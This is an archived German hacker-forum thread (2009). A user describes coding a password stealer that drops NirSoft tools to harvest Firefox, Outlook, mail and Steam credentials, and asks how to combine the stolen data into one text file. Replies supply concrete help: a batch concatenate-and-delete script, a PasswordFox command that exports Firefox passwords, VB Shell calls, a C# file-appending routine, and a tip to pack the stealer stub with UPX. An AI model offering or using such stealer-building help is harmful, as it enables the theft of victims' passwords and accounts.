PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : alle pw´s in eine .txt datei



inmate
27.03.2009, 16:00
heyy leute , also ich habe vor einen stealer zu coden.
wegen meinen noch nicht so grossen kentnissen mache ich es mit nirsoft tools.
er soll den steam hash auslesen (selbergemacht)^^
mail ,outlook und firefox klauen.
soweit so gut doch ich habe ein problem.

also man droppt ja die ressourcen auf der festplatte ( die nirsoft tool).
ich bekomms einfach nicht hin das die 3 nirsoft tools ihre geklauten daten in 1 .txt datei speichern ich habe schon überlegt ob ich es mit streamwriter und streamreader machen soll aber das ist umständlich.^^

gibt es noch eine art für die faulen leute :)?


freue mich auf eure hilfe

lG
inmate

AlterHacker
27.03.2009, 16:13
@echo off
COPY DATEI1 + DATEI2 + DATEI3 ZIEL
DEL DATEI1
DEL DATEI2
DEL DATEI3

Batch^^

Sawyer
27.03.2009, 16:13
StreamWriter ist überhaupt nicht umständlich , lass es einfach anhängen und nicht überschreiben , dann ist das Problem gelöst

MfG

redshark
27.03.2009, 16:17
vllt meinst du das?


passwordfox.exe /stext C:\Passes.txt

so wird mit passwordfox eine txt mit den pws erstellt auf dem pfad c:\

um es in vb auszudrücken:


Shell "C:\PasswordFox.exe \stext C:\passes.txt"
Shell "C:\passes.txt"

Sirect
29.03.2009, 13:56
Er will alles in eine Datei schreiben =)

Mach einfach ne Richtextbox und lade die Files im Plain, dann kanste Sie aneinander hängen - Richtextboxen sind gut für anfänger, weil man damit Dateien direkt laden kann.

snify
29.03.2009, 14:08
Also Batch fand ich am besten :P
Vielleich kannst du es auch mit einem Datenstream probieren?
(z.B. bei Steamreader)
steamreader.exe X:\Steam\datei.blob > C:\test.txt (Datei jedesmal überschrieben)
steamreader.exe X:\Steam\datei.blob >> C:\test.txt

Also ich würde es vielleicht auch so machen, dass du erst mal jede Datei einzeln hast.
Danach öffnest du jede Datei und liest den Inhalt in einen String (Variable) Sobald du das mit allen .txts gemacht hast, einfach alle Variablen miteinander verbinden und in eine neue Datei schreiben ;) (so hab ichs gemacht ^^)
Kleiner Tipp. Deine Stub wird wahrscheinlich riesig werden mit Nirsoft. Versuch die vorher mal zu entpacken mit UPX , ein paar Ressourcen rausnehmen und dann wieder UPX die ganze .exe kleinpacken ;)

Steav
30.03.2009, 08:23
private Boolean WriteStringToTXT(String Inhalt, Boolean NeueZeile) { try { System.IO.FileInfo txtFile = new System.IO.FileInfo(Application.StartupPath + "\\testdatei.txt"); System.IO.StreamWriter sw; if (txtFile.Exists) sw = System.IO.File.AppendText(txtFile.FullName); else sw = System.IO.File.CreateText(txtFile.FullName); if (NeueZeile) sw.Write(Environment.NewLine + Inhalt); else sw.Write(Inhalt); sw.Flush(); sw.Close(); } catch (Exception) { return false; } return true; }